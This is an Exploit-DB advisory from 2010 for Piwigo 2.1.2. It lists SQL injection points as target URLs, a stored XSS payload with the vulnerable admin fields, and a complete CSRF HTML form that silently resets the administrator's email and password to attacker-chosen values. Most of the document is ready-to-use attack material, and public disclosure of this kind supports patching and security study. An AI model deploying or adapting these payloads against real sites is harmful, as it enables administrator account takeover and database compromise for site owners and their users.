piwigo-2.1.2 - Multiple Vulnerabilities

EDB-ID:

14973

CVE:



Author:

Sweet

Type:

webapps


Platform:

PHP

Date:

2010-09-11


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

--=Sql injection=--


http://www.target.com/path/comments.php?keyword=charif38@hotmail.fr&author=sweet&cat=1[SQLi]&since=1&sort_by=date&sort_order=DESC&items_number=5

http://www.target.com/path/picture.php?1sweet[SQLi]&action=rate=0

http://www.target.com/path/index.php?/search/10[SQli]


--=Stored Xss=--

Admin login required
Attack pattern : >'<script>alert("Sweet")</script>

http://www.target.com/path/admin.php?page=tags

The POST variable "Nouveau tag" is vulnerable to a stored xss attack

http://www.target.com/path/admin.php?page=cat_list

The POST variable "Ajouter une catégorie virtuelle" is vulnerable to a stored xss attack



--=CSRF=--
Change admin password exploit

<html>
<body>
<h1>Piwigo-2.1.2 Change admin password CSRF </h1>
<form method="POST" name="form0" action="http://www.target.com/path/admin.php?page=profile&user_id=1">
<input type="hidden" name="redirect" value="admin.php?page"/>
<input type="hidden" name="mail_address" value="charif38@hotmail.fr"/> <!-- Your email here -->
<input type="hidden" name="use_new_pwd" value="sweet"/> <!-- Your password here -->
<input type="hidden" name="passwordConf" value="sweet"/> <!-- Your password here -->
<input type="hidden" name="nb_image_line" value="5"/>
<input type="hidden" name="nb_line_page" value="3"/>
<input type="hidden" name="theme" value="Sylvia"/>
<input type="hidden" name="language" value="fr_FR"/>
<input type="hidden" name="recent_period" value="7"/>
<input type="hidden" name="expand" value="false"/>
<input type="hidden" name="show_nb_comments" value="false"/>
<input type="hidden" name="show_nb_hits" value="false"/>
<input type="hidden" name="maxwidth" value=""/>
<input type="hidden" name="maxheight" value=""/>
<p> Push the Button <input type="submit" name="validate" value="Valider"/> </p>
</form>
<form method="GET" name="form1" action="http://www.target.com/path/admin.php?page=user_list">
<input type="hidden" name="name" value="value"/> 
</form>
</body>
</html>


[ thx and RIP to Milw0rm.com , JF - Hamst0r - Keystroke you always be right here 3> ] , inj3ct0r.com , exploit-db.com


1,2,3 VIVA LALGERIE